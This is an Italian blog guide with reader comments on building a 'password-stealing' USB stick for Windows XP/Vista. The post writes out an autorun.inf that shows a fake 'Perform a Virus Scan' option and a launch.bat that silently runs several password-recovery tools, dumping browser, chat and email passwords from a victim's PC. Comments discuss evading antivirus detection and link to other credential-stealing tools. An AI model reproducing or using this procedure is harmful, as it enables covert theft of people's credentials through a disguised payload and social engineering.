Geekissimo

Guida: creare una penna USB ruba-password per spaventare gli amici (Windows XP/Vista)

 
Andrea Guida (@naqern)
31 Agosto 2009
31 commenti

Molti utenti utilizzano Windows XP/Vista. Molti utenti utilizzano software quali Internet Explorer, Firefox, Live Messenger ed Outlook. Molti utenti non si curano minimamente del fatto che tutte le password conservate in questi programmi sono facilmente rintracciabili da soggetti terzi. Molti utenti lasciano che l’autorun di dischi e dispositivi USB faccia il proprio comodo senza batter ciglio. Molti utenti credono che aver installato un antivirus – magari non aggiornato dai tempi delle guerre puniche – li protegga contro qualsiasi minaccia informatica e tendono a cliccare ovunque gli capiti.

Con questo quadretto (abbastanza desolante) di fronte a noi, possiamo dar libero sfogo alla nostra fantasia da geek e mettere in pratica un esperimento a metà strada tra il perfido e l’astuto: la creazione di una penna USB ruba-password che, una volta inserita nel PC della vittima designata, avvia una finta scansione antivirus mentre salva in alcuni file di testo tutte le parole chiave rintracciate in browser, programmi di chat e client di posta elettronica.

Ecco la procedura per crearne una. Ma ricordate, si tratta solo di un esperimento “simpatico”: nulla di particolarmente elaborato e, soprattutto, nulla che debba essere usato in contesti diversi da quello goliardico. Divertitevi!
  1. Scaricare i programmi MessenPass (recupera password da tutti i più popolari software di IM), Mail PassView (recupera password da tutti i principali client per la posta elettronica), IE Passview (recupera le password da Internet Explorer), Protected Storage PassView (recupera password da Internet Explorer, Outlook Express ed MSN Explorer) e Password Fox (recupera password da Firefox);

  2. Copiare gli eseguibili di tutti questi programmi (mspass.exe, mailpv.exe, iepv.exe, pspv.exe e passwordfox.exe) nella directory principale della penna USB da utilizzare come “ruba-password”;
  3. Aprire il Blocco Note, digitare al suo interno quanto segue e salvare il file come autorun.inf, sempre nella directory principale della penna USB:
  4. [autorun]

    open=launch.bat

    ACTION= Perform a Virus Scan

  5. Aprire il Blocco Note, digitare al suo interno quanto segue e salvare il file come launch.bat, sempre nella directory principale della penna USB:
  6. start mspass.exe /stext mspass.txt

    start mailpv.exe /stext mailpv.txt

    start iepv.exe /stext iepv.txt

    start pspv.exe /stext pspv.txt

    start passwordfox.exe /stext passwordfox.txt

  7. Inserire la penna USB nel PC dal quale s’intende rubare le password e, nella schermata dell’autorun, selezionare la voce Perform a Virus Scan;
  8. Attendere che la finta procedura di scansione antivirus termini e godersi il frutto del proprio lavoro truffaldino (le parole chiave vengono tutte conservate in dei file di testo contenuti nella penna stessa).
Via | Hacking Tips & Tricks

Foto | Flickr
Potrebbe interessarti anche
Articoli Correlati
Guida: creare una penna USB multi-boot per il pronto soccorso del PC

Guida: creare una penna USB multi-boot per il pronto soccorso del PC

Lungi da noi asserire che si tratta di supporti obsoleti, ma una cosa è certa: portare con sé una penna USB è molto meglio che dover girovagare con un fragile […]

Windows 7: come disabilitare Windows Defender

Windows 7: come disabilitare Windows Defender

Utilizzate Windows 7 su un computer di non primissimo pelo ed avete deciso di rinunciare a qualche funzionalità per velocizzare il tutto? Avete scaricato/acquistato un anti-malware degno di nota e […]

Come rendere meno stressante AntiVir 8

Come rendere meno stressante AntiVir 8

Ormai Avira AntiVir non ha davvero più bisogno di presentazioni: sia nella sua versione gratuita che in quella a pagamento è da tempo considerato uno dei migliori antivirus del mondo, […]

Come avviare una scansione antivirus automatica all’inserimento delle penne USB nel PC

Come avviare una scansione antivirus automatica all’inserimento delle penne USB nel PC

Oramai, anche per il “panico” da virus scatenato ad ogni loro inserimento in un PC, le penne USB hanno sostituito egregiamente gli indimenticabili floppy disk. Proprio per questo è necessario […]

Come rimuovere i virus dalle penne USB

Come rimuovere i virus dalle penne USB

Un po come i cari, vecchi floppy disk, anche le penne USB di non sicurissima provenienza sono spesso vettori di fastidiosi quanto dannosi virus informatici. Molte delle minacce che “viaggiano […]

Lista Commenti
Aggiungi il tuo commento

Fai Login oppure Iscriviti: è gratis e bastano pochi secondi.

Nome*
E-mail**
Sito Web
* richiesto
** richiesta, ma non sarà pubblicata
Commento

  • #1markgandalf

    provato e molto utile anche come password recovery…

    devo dire che avast, anche se aggiornato, non lo vede minimamente
    mentre provato su un pc con norton ne ha sgamati 2, poi non ho proseguito e ho rimosso la chiavetta

    veramente utile
    grazie

    31 Ago 2009, 12:48 pm Rispondi|Quota
  • #2Cia91

    AVG me li ha sgamati subito….uffa…:(

    31 Ago 2009, 1:08 pm Rispondi|Quota
  • #3padim

    Un post…dal passato!

    31 Ago 2009, 1:09 pm Rispondi|Quota
  • #4Aston

    2 Domande..

    Se devo mettere quei file nella directory principale significa che non devo metterle in nessuna cartella, giusto?

    Se il computer non

    31 Ago 2009, 1:20 pm Rispondi|Quota
  • #5Aston

    Aston dice:

    Se il computer non

    Ooops, lasciate perdere la seconda ^^

    31 Ago 2009, 1:21 pm Rispondi|Quota
  • #6M@ttia

    Aggiungerei un @echo off all’inizio del file bat 😉

    31 Ago 2009, 1:38 pm Rispondi|Quota
  • #7Suxsem

    viene rilevato subito…
    usate qualcosa di più serio…
    uno script per messenger che ruba le password dei contatti
    http://hackeco.forumfree.net/?t=41731864
    (sono l’autore 🙂 )

    31 Ago 2009, 1:41 pm Rispondi|Quota
  • #8Pirate..

    ma scusa… per PERFORM A VIRUS SCAN… la scansiione la fa come ??? e con il mio antivirus????
    POI, se io metto come action , per esempio, Procedura di recovery password, nell’autoplay mi uscirà la voce chiamata così ma farà comunque una scansione fake o recupererà solo le password in modo silenzioso??
    grazie

    31 Ago 2009, 1:43 pm Rispondi|Quota
  • #9marco

    super sgamati da McAfee 🙁

    31 Ago 2009, 2:11 pm Rispondi|Quota
  • #10damiano

    mi permetto di segnalare un link con qcs di meglio:

    http://www.chicchedicala.it/2007/12/11/rubare-tutte-le-password-di-un-pc-con-lupen-pen-drive/

    damiano

    31 Ago 2009, 2:11 pm Rispondi|Quota
  • #11soma

    questa guida è un aranzullata…
    Inoltre vecchia vecchia!!

    31 Ago 2009, 2:14 pm Rispondi|Quota
  • #12Andrea Guida (Naqern)

    @ markgandalf: grazie a te! 😉

    @ Pirate..: puoi mettere qualsiasi voce ed uscirà quella nell’autoplay

    @ Aston: esatto

    ciao! 🙂

    31 Ago 2009, 3:53 pm Rispondi|Quota
  • #13Andrea Guida (Naqern)

    @ Pirate..: scusa ma mi era sfuggita la prima parte della tua domanda. L’antivirus non c’entra niente, quella dicitura è solo uno specchietto per le allodole.

    Rimanendo in tema, anche avira non sembra rilevare alcunché. 😉

    ciao!

    31 Ago 2009, 5:20 pm Rispondi|Quota
  • #14Pirate..

    @ Andrea Guida (Naqern):
    Capito tutto….
    Grazie
    ciao

    31 Ago 2009, 6:00 pm Rispondi|Quota
  • #15AndreaTek

    PasswordFox non mi funziona, dà sempre errore, in compenso funziona quello per Google Chrome 😀

    Si chiama ChromePass

    31 Ago 2009, 6:50 pm Rispondi|Quota
  • #16Andrea Guida (Naqern)

    @ Pirate..: di nulla 😉

    @ AndreaTek: strano, a me va alla perfezione.

    ciao! 🙂

    31 Ago 2009, 7:07 pm Rispondi|Quota
  • #17FrancescO

    Per le pass di Opera c’è niente?

    31 Ago 2009, 8:26 pm Rispondi|Quota
  • #18forniture alberghiere

    Si nella lista era meglio indicare di chiudere l’anticirus o probabilmente i files verranno cvancellati, super grazie per la dritta.

    1 Set 2009, 9:37 am Rispondi|Quota
  • #19forniture alberghiere

    Si nella lista era meglio indicare di chiudere l’anticirus o probabilmente i files verranno cvancellati, super grazie per la dritta.
    Per mettere i files nella sottocartella, penso sia sufficente cambiare i percorsi dei .exe nel file launch.bat

    1 Set 2009, 9:58 am Rispondi|Quota
  • #20andrea

    è molto interessante e utile l'unico problema che ho trovato e nell'estrarre MSPASS e PSPV al momento dell'estrazione il pc li cancellava dalla cartella

    20 Feb 2010, 2:14 pm Rispondi|Quota
  • #21Enricop

    bello bello! funziona su seven pro 64 bit.. l'unica cosa è che non riesco ad abilitare la parte dell'autorun.inf.. mi aiutate please?

    inoltre, se creo una cartella a parte e avvio a mano funzia lo stesso?

    grazieee

    7 Mar 2010, 11:58 am Rispondi|Quota
    • #22lauro

      Ciao chi mi sa dire come fare? o dove postare se voi non sapete??
      ho riscontrato svariate volte il messaggio dove mi ricorda che la partizione “ os_tools (E).__Verificando effettivamente ho :__Disco locale (C:) 70GB su 102GB __HP_RECOVERY (D:) 467MB su 7,42 GB __OS_TOOLS(E:) 6,05MB su 1,55 GB__Il notebook è hp ed è installato Vista Home Basic OEMAct__Cosa serve L’ HP_RECOVERY (D:) ?__Cosa serve L’ OS_TOOLS(E:) ?__Posso velocizzare il pc?

      7 Apr 2010, 8:07 pm Rispondi|Quota
  • #23_luigi75

    Dall'articolo……

    "Molti utenti utilizzano Windows XP/Vista. Molti utenti utilizzano software quali Internet Explorer, Firefox, Live Messenger ed Outlook. Molti utenti non si curano minimamente del fatto che tutte le password conservate in questi programmi sono facilmente rintracciabili da soggetti terzi. Molti utenti lasciano che l’autorun di dischi e dispositivi USB faccia il proprio comodo senza batter ciglio. Molti utenti credono che aver installato un antivirus – magari non aggiornato dai tempi delle guerre puniche – li protegga contro qualsiasi minaccia informatica e tendono a cliccare ovunque gli capiti….. […]"

    …e che vita dimmerda ad usare quella schifezza di winzozz……

    7 Giu 2010, 2:32 pm Rispondi|Quota
  • #25Fede

    ho fatto tutto alla lettera ma perchè quando inserisco la chiavetta nel mio pc nn mi viene fuori nell'autoplay la voce " Perform a Virus Scan" ??____ps io sia i programmi ke l'autorun ke il launch li ho messi dentro la chiavetta dentro una cartella è un problema? o dovevo metterli semlicemente dentro la chiavetta senza creare nessuna cartella?

    31 Ago 2010, 12:42 am Rispondi|Quota
  • #26Mitto

    Scusate chi mi sa dire dove è laq directory principale della pen drive

    25 Giu 2011, 11:08 am Rispondi|Quota
  • #27Luca

    scusa, ma quando inserisco la chiavetta non mi si avvia la copia automatica, mi chiede la scansione, ma devo avviare manualmente il file .bat per ottenere le password

    12 Lug 2011, 10:57 am Rispondi|Quota
  • #28ERNESTO

    scusa ma qual’e la directory del usb

    9 Ago 2011, 12:41 pm Rispondi|Quota
  • #29Nicholas

    a me non parte l'autorun

    21 Ago 2011, 8:02 pm Rispondi|Quota
  • #30Giuseppe

    t tyvmj

    23 Ago 2012, 3:28 pm Rispondi|Quota
  • #31Fede

    Buonasera, mi sono imbattuta nel suo blog e volevo chiedere un’informazione che non riesco a trovare nel suo utilissimo sito! Spero possa rispondermi ed aiutarmi!
    Da una chiavetta usb, è possibile risalire ad un pc? Mi spiego meglio, se su una chiavetta usb volessi mettere un video o un file, sarebbe possibile poi risalire all’origine di quel file? Cioè è possibile capire da che pc è stato preso?
    Grazie mille e scusi se mi permetto di chiedere ma nn so a chi rivolgermi!
    Federica

    25 Feb 2014, 11:29 pm Rispondi|Quota